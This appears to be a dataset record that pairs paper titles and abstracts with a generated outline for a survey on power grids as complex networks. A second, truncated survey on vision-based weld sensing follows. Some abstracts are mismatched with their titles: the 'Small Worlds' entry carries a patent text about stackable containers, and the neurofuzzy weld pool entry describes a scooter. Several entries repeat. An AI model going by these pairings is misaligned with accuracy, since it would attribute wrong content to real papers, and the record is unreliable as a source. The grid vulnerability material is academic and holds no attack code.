graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascading Link Failure in the Power Grid: A Percolation-Based Analysis paper_content: Large-scale power blackouts caused by cascading failure are inflicting enormous socioeconomic costs. We study the problem of cascading link failures in power networks modelled by random geometric graphs from a percolation-based viewpoint. To reflect the fact that links fail according to the amount of power flow going through them, we introduce a model where links fail according to a probability which depends on the number of neighboring links. We devise a mapping which maps links in a random geometric graph to nodes in a corresponding dual covering graph. This mapping enables us to obtain the first-known analytical conditions on the existence and non-existence of a large component of operational links after degree-dependent link failures. Next, we present a simple but descriptive model for cascading link failure, and use the degree-dependent link failure results to obtain the first-known analytical conditions on the existence and non-existence of cascading link failures. --- paper_title: Classes of small-world networks paper_content: We study the statistical properties of a variety of diverse real-world networks. We present evidence of the occurrence of three classes of small-world networks: (a) scale-free networks, characterized by a vertex connectivity distribution that decays as a power law; (b) broad-scale networks, characterized by a connectivity distribution that has a power law regime followed by a sharp cutoff; and (c) single-scale networks, characterized by a connectivity distribution with a fast decaying tail. Moreover, we note for the classes of broad-scale and single-scale networks that there are constraints limiting the addition of new links. Our results suggest that the nature of such constraints may be the controlling factor for the emergence of different classes of networks. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Mean-field theory for scale-free random networks paper_content: Random networks with complex topology are common in Nature, describing systems as diverse as the world wide web or social and business networks. Recently, it has been demonstrated that most large networks for which topological information is available display scale-free features. Here we study the scaling properties of the recently introduced scale-free model, that can account for the observed power-law distribution of the connectivities. We develop a mean-field method to predict the growth dynamics of the individual vertices, and use this to calculate analytically the connectivity distribution and the scaling exponents. The mean-field method can be used to address the properties of two variants of the scale-free model, that do not display power-law scaling. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Power Grid Network Evolutions for Local Energy Trading paper_content: The shift towards an energy Grid dominated by prosumers (consumers and producers of energy) will inevitably have repercussions on the distribution infrastructure. Today it is a hierarchical one designed to deliver energy from large scale facilities to end-users. Tomorrow it will be a capillary infrastructure at the Medium and Low Voltage levels that will support local energy trading among prosumers. In [74], we analyzed the Dutch Power Grid and made an initial analysis of the economic impact topological properties have on decentralized energy trading. In this paper, we go one step further and investigate how dierent networks topologies and growth models facilitate the emergence of a decentralized market. In particular, we show how the connectivity plays an important role in improving the properties of reliability and pathcost reduction. From the economic point of view, we estimate how the topological evolutions facilitate local electricity distribution, taking into account the main cost ingredient required for increasing network connectivity, i.e., the price of cabling. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. ---
Title: The Power Grid as a Complex Network: a Survey Section 1: Introduction Description 1: Outline the purpose and scope of the survey, provide background on Complex Network Analysis (CNA), and explain its relevance to the study of power grids. Section 2: Background and Survey Methodology Description 2: Define common terms and concepts used in CNA, provide essential graph theory definitions, and describe the methodology used to analyze and compare studies in the survey. Section 3: The Power Grid as a Complex Network Description 3: Discuss the application of complex network analysis to power grids and describe the specific studies reviewed in this survey. Section 4: Basic Power Grid Characteristics Description 4: Identify and compare basic non-technical characteristics of the power grids analyzed in various studies, such as geography, type of Grid (high, medium, low voltage), and sample size. Section 5: Statistical Global Graph Properties Description 5: Summarize the main statistical properties of the power grids under analysis, including order, size, average degree, node degree distribution, and betweenness distribution. Section 6: The Small-World Property Description 6: Examine whether the power grids analyzed exhibit the small-world property and compare findings from various studies. Section 7: Node Degree Distribution Description 7: Summarize findings on the degree of nodes within the power grids and fit these findings into distribution models, such as exponential or power-law distributions. Section 8: Betweenness Distribution Description 8: Describe the distribution of betweenness centrality in the power grids and its implications on the infrastructure's robustness. Section 9: Resilience Analysis Description 9: Compare the resilience of different power grids to random failures and targeted attacks on nodes and edges, and describe the metrics used to assess this resilience. Section 10: Studies with Infrastructure Improvement Analysis Description 10: Review studies that propose and assess strategies for improving the reliability and robustness of the power grids. Section 11: Further Studies Description 11: Highlight additional analyses and investigations from the surveyed studies that provide unique insights into the power grid as a complex network. Section 12: Discussion and Conclusion Description 12: Summarize the overall findings of the survey, discuss common patterns and notable differences, and provide recommendations for future research directions.
Vision-based sensing of the welding process : a survey
5
--- paper_title: Vision Based GTA Weld Pool Sensing and Control Using Neurofuzzy Logic paper_content: A steerable scooter including a standing platform supported on a rollable rear support wheel, a steerable front support wheel, and adjustable seat assembly. The scooter includes a support platform positioned below the top surface of the support wheels. In addition, the scooter includes an adjustable seat that has a top surface positionable two or more inches below the top surface of the support wheels. --- paper_title: A sensing torch for on-line monitoring of the gas tungsten arc welding process of steel pipes paper_content: Non-intrusive and real-time monitoring techniques are increasingly required by manufacturing industry in order to detect flaws in arc welding processes. In this work the development of an optical inspection system, for monitoring the manual gas tungsten arc welding (GTAW) process of steel pipes, is described. The arc plasma visible emission produced during the process was acquired and spectroscopically analysed. Measuring the intensities of selected argon emission lines allowed real time calculation and recording of the axial electron temperature of the plasma. Experimental results showed that the temperature signal varies greatly in the case of instabilities of the weld pool that cause weld defects. A suitable algorithm, based on a statistical analysis of the signal, was developed in order to real time flag defective joints. It is shown that several weld defects such as porosity, dropout, lack of fusion, solid inclusions and craters were successfully detected in a production environment. The performances of the optical sensor were compared with the results of state-of-the-art post-weld controls such as x-rays and penetrating dyes, showing good agreement and thus demonstrating the validity of this quality monitoring system. --- paper_title: Determination of axial thermal plasma temperatures without Abel inversion paper_content: This paper presents an approximate formula for the determination of local axis temperatures of an inhomogeneous, axisymmetric, optically thin, local thermodynamic equilibrium plasma column without using the Abel inversion technique. The proposed method is straightforward and is based on recording the spatially integrated radiances of spectral lines. The formula is useful for high gradients thermal plasma columns of the type found in DC electric arcs or plasma jets of gaussian shaped temperature profile. The formulation permits a simple experimental arrangement for rapid monitoring or control of parameters in industrial plasma devices or for the determination of emissivities and line transition probabilities. We also show that the method can be applied to spatially unstable arc discharges, where traditional techniques are difficult and cumbersome to apply. --- paper_title: Spectroscopic studies of plasma during cw laser materials interaction paper_content: The role of plasma during cw laser materials interaction was studied using emission spectroscopy. The experiments were carried out in two stages: first, with a pure argon plasma; and second, with an aluminum target in an argon atmosphere. The electron‐temperature distribution and electron density were determined. The experimental results were used to estimate laser attenuation and refraction as the beam propagated through the plasma column. Thus, transmitted energy and energy distribution on the target surface were determined. This was expected to be a more realistic input for transport phenomena models based on absorbed energy. --- paper_title: Spectroscopic Study Of Laser-Induced Plasma In The Welding Process Of Steel And Aluminium paper_content: Results of spectral diagnostics of the plasma produced by intense laser radiation during the welding process of steel and aluminium with CO2 lasers are presented. The experiments were carried out in an intensity range I = 106 ÷ 107 W/cm and with He, N2, Co2, Ar as shielding gases. The electron plasma temperature T and density n were measured under various processing and shielding gas conditions.It is shown that the time-averaged plasma temperature correlates with the welding results such as e.g. a welding depth obtained by varation of the welding speed and process gas. In this way it is demonstrated that spectral characteristics of the plasma can be used in the monitoring of the plasma and in the optimalization of the welding process. Furthermore, it is shown that spectroscopic results help to explain the influence of the process gas. Examples of cooling, heating and shielding effects caused by process gases are shown and discussed in view of the efficiency of the welding process. --- paper_title: Experimental study of laser-induced plasma in welding conditions with continuous CO2 laser paper_content: Laser‐induced plasmas obtained during a welding process have been studied. Spectroscopic diagnostics and an integrating sphere collecting the reflected CO2 light are the principal diagnostics used in order to determine the spatial variations of the microscopic parameters such as electron density and temperature, and the energy absorption during this process. For several experimental processing conditions of shielding gases, the main perturbing effects such as absorption and refraction of the CO2 laser radiation are quantified. Several possibilities for reducing these perturbing effects are then discussed. --- paper_title: Spectroscopic characterization of laser-induced plasma created during welding with a pulsed Nd:YAG laser paper_content: A spectroscopic study of a laser-induced plume created during the welding of stainless steel and other materials (iron and chromium) has been carried out. A pulsed Nd:YAG laser of 1000 W average power is used. The evolutions of the electron temperature and electron density have been studied for several welding parameters. We use working powers from 300 to 900 W and pulse durations between 1.5 and 5 ms. The influence of shielding gases like nitrogen and argon has been taken into account. Temperature and density calculations are based on the observation of the relative intensities and shapes of the emission peaks. We assume that the plasma is in local thermal equilibrium. The temperature is calculated with the Boltzmann plot method and the density with the Stark broadening of an iron line. The electron temperatures vary in the range of 4500–7100 K, electron density between 3×1022 and 6.5×1022 m−3. The absorption of the laser beam in the plasma is calculated using the Inverse Bremsstrahlung theory.A spectroscopic study of a laser-induced plume created during the welding of stainless steel and other materials (iron and chromium) has been carried out. A pulsed Nd:YAG laser of 1000 W average power is used. The evolutions of the electron temperature and electron density have been studied for several welding parameters. We use working powers from 300 to 900 W and pulse durations between 1.5 and 5 ms. The influence of shielding gases like nitrogen and argon has been taken into account. Temperature and density calculations are based on the observation of the relative intensities and shapes of the emission peaks. We assume that the plasma is in local thermal equilibrium. The temperature is calculated with the Boltzmann plot method and the density with the Stark broadening of an iron line. The electron temperatures vary in the range of 4500–7100 K, electron density between 3×1022 and 6.5×1022 m−3. The absorption of the laser beam in the plasma is calculated using the Inverse Bremsstrahlung theory. --- paper_title: Weld pool edge detection for automated control of welding paper_content: A vision system that determines the edges of the weld pool in sequences of gas-tungsten-arc welding images acquired by a coaxial viewing system is described. The vision system uses a transformation that maps the edge of a weld pool into a vertical line. The weld pool edge is detected in the transform domain by using a directional filter, which retains only intensity changes of interest, and a one-dimensional edge detector. The edge of the weld pool, in the physical domain, is determined using the inverse transformation. The transformation uses parameters that are updated when processing a sequence of images, and are initially determined by analyzing the first image frame in the physical domain. > --- paper_title: An image analysis system for coaxially viewed weld scenes paper_content: We present a complete, working system for analyzing coaxially viewed robotic weld scenes. The analysis is cast in the form of a consistent labeling problem in which the objects are small image regions from a regular tesselation and the possible labels are base metal, electrode, gas cup, filler wire, weld bead, and weld pool. Local domain knowledge and measurements on the image function are used to produce an initial set of labeling probabilities. These are then adjusted by probabilistic relaxation using global domain knowledge to arrive at a final consistent labeling, which constitutes the image analysis. The primary goal of this analysis is a sufficiently accurate description of the size and shape of the weld pool to allow quality monitoring of the welding process. This represents a significant departure from the primary objectives of prior work in this area, most of which has focused on the seam tracking problem. Discussions with welding engineers indicate that they are anxious to acquire whatever information may be available. Thus, this system serves the secondary goal of providing some idea of what might be possible, given both relatively modest, and therefore affordable, resources and a real time performance requirement. In constructing and demonstrating a complete system, we provide useful insight into the engineering of such systems for practical applications, addressing attribute extraction, feature selection, and statistical region classification. A novel, efficient near-optimal feature selection algorithm which we callratchet search is also presented. Finally, we discuss how such a system, which is quite robust, could be embedded into robotic welding systems to provide important weld quality analysis for process control. --- paper_title: Sensing and Control of Weld Pool Geometry for Automated GTA Welding paper_content: Weld pool geometry is a crucial factor in determining welding quality, especially in the case of sheet welding. Its feedback control should be a fundamental requirement for automated welding. However, the real-time precise measurement of pool geometry is a difficult procedure. It has been shown that vision sensing is a promising approach for monitoring the weld pool geometry. Quality images that can be processed in real-time to detect the pool geometry are acquired by using a high shutter speed camera assisted with nitrogen laser as an illumination source. However, during practical welding, impurities or oxides existing on the pool surface complicate image processing. The image features are analyzed and utilized for effectively processing the image. It is shown that the proposed algorithm can always detect the pool boundary with sufficient accuracy in less than 100 ms. Based on this measuring technique, a robust adaptive system has been developed to control the pool area. Experiments show that the proposed control system can overcome the influence caused by various disturbances. --- paper_title: Vision-based measurement of weld pool geometry in constant-current gas tungsten arc welding paper_content: AbstractThe common commercial charge coupled device (CCD) camera is combined with a composite light filter to form a vision sensing system of low cost. It can capture the whole image of a weld pool clearly during constant-current gas tungsten arc welding (GTAW). Based on the image-processing algorithm, the edges of the weld pool under different welding conditions can be extracted. Calibration is made to obtain the weld pool geometry in real size. The measured results are useful for developing a welding process control system and verifying the mathematical models of weld pool behaviours. --- paper_title: Computation of 3D weld pool surface from the slope field and point tracking of laser beams paper_content: A novel computation method of the 3D weld pool surface from specular reflection of laser beams is presented in this paper. The mathematical model for the three-dimensional surface measurement technique has been developed. The structured pattern of a laser is projected on the weld pool in a molten state and the reflection observed using a CCD camera. These reflected patterns can be tracked using image processing techniques including optical flow and moving point tracking. A simulation model has been developed implementing these techniques. The movement of the reflected laser during the welding process is indicative of the change in state of the weld pool. The surface slope field is calculated from the law of reflection and is used to compute the 3D surface of the weld pool. The measurement technique is tested on objects with a priori knowledge of geometry having a specular surface to test the effectiveness of the measurement technique. --- paper_title: Real-Time Image Processing for Monitoring of Free Weld Pool Surface paper_content: The arc weld pool is always deformed by plasma jet. In a previous study, a novel sensing mechanism was proposed to sense the free weld pool surface. The specular reflection of pulsed laser stripes from the mirror-like pool surface was captured by a CCD camera. The distorted laser stripes clearly depicted the 3D shape of the free pool surface. To monitor and control the welding process, the on-line acquisition of the reflection pattern is required. In this work, the captured image is analyzed to identify the torch and electrode. The weld pool edges are then detected. Because of the interference of the torch and electrode, the acquired pool boundary may be incomplete. To acquire the complete pool boundary, models have been fitted using the edge points. Finally, the stripes reflected from the weld pool are detected. Currently, the reflection pattern and pool boundary are being related to the weld penetration and used to control the weld penetration. --- paper_title: A novel stereo camera system by a biprism paper_content: We propose a novel and practical stereo camera system that uses only one camera and a biprism placed in front of the camera. The equivalent of a stereo pair of images is formed as the left and right halves of a single charge coupled device (CCD) image using a biprism. The system is therefore cheap and extremely easy to calibrate since it requires only one CCD camera. An additional advantage of the geometrical setup is that corresponding features lie on the same scanline automatically. The single camera and biprism have led to a simple stereo system for which correspondence is very easy and accurate for nearby objects in a small field of view. Since we use only a single lens, calibration of the system is greatly simplified. Given the parameters in the biprism-stereo camera system, we can reconstruct the three-dimensional structure using only the disparity between the corresponding points. --- paper_title: Computation of 3D weld pool surface from the slope field and point tracking of laser beams paper_content: A novel computation method of the 3D weld pool surface from specular reflection of laser beams is presented in this paper. The mathematical model for the three-dimensional surface measurement technique has been developed. The structured pattern of a laser is projected on the weld pool in a molten state and the reflection observed using a CCD camera. These reflected patterns can be tracked using image processing techniques including optical flow and moving point tracking. A simulation model has been developed implementing these techniques. The movement of the reflected laser during the welding process is indicative of the change in state of the weld pool. The surface slope field is calculated from the law of reflection and is used to compute the 3D surface of the weld pool. The measurement technique is tested on objects with a priori knowledge of geometry having a specular surface to test the effectiveness of the measurement technique. --- paper_title: A novel stereo camera system by a biprism paper_content: We propose a novel and practical stereo camera system that uses only one camera and a biprism placed in front of the camera. The equivalent of a stereo pair of images is formed as the left and right halves of a single charge coupled device (CCD) image using a biprism. The system is therefore cheap and extremely easy to calibrate since it requires only one CCD camera. An additional advantage of the geometrical setup is that corresponding features lie on the same scanline automatically. The single camera and biprism have led to a simple stereo system for which correspondence is very easy and accurate for nearby objects in a small field of view. Since we use only a single lens, calibration of the system is greatly simplified. Given the parameters in the biprism-stereo camera system, we can reconstruct the three-dimensional structure using only the disparity between the corresponding points. --- paper_title: Mathematical formulation and simulation of specular reflection based measurement system for gas tungsten arc weld pool surface paper_content: Weld pool surface can change dynamically during welding and is indicative of information critical to controlling the process. Research has picked up in the field of observing the weld pool surface to understand the dynamics of the welding process. This paper will help visualize and understand the physics involved in observing the weld pool surface. A study of laser properties, weld pool and camera optics was incorporated in developing a model to describe the mechanism of observing the weld pool surface from specular reflection. This observation method projects a laser beam on the pool surface through an optical grid with a frosted glass attached. The corresponding specular reflection is calculated, which is derived based on the reflection law. The reflected laser beams are then captured by the camera to form the image. The model can be used to predict the outcome of experiments with grids placed in front of the laser and to determine the position where the camera should be placed to acquire the best image. Preliminary results showed that the camera should be placed with the weld pool along the optical axis, and the aperture should be as large as possible to allow as many rays into the camera as possible. The model can be used to find the optimal location of the laser and camera for materials of different thickness, by moving the electrode higher in the simulation, and adjusting the laser and camera location accordingly. The paper will give some insight into problems that might be encountered in observing the weld pool, and suggest the set-up of the laser and camera for obtaining the best image. --- paper_title: The variational approach to shape from shading paper_content: Abstract We develop a systematic approach to the discovery of parallel iterative schemes for solving the shape-from-shading problem on a grid. A standard procedure for finding such schemes is outlined, and subsequently used to derive several new ones. The shape-from-shading problem is known to be mathematically equivalent to a nonlinear first-order partial differential equation in surface elevation. To avoid the problems inherent in methods used to solve such equations, we follow previous work in reformulating the problem as one of finding a surface orientation field that minimizes the integral of the brightness error. The calculus of variations is then employed to derive the appropriate Euler equations on which iterative schemes can be based. The problem of minimizing the integral of the brightness error term is ill posed, since it has an infinite number of solutions in terms of surface orientation fields. A previous method used a regularization technique to overcome this difficulty. An extra term was added to the integral to obtain an approximation to a solution that was as smooth as possible. We point out here that surface orientation has to obey an integrability constraint if it is to correspond to an underlying smooth surface. Regularization methods do not guarantee that the surface orientation recovered satisfies this constraint. Consequently, we attempt to develop a method that enforces integrability, but fail to find a convergent iterative scheme based on the resulting Euler equations. We show, however, that such a scheme can be derived if, instead of strictly enforcing the constraint, a penalty term derived from the constraint is adopted. This new scheme, while it can be expressed 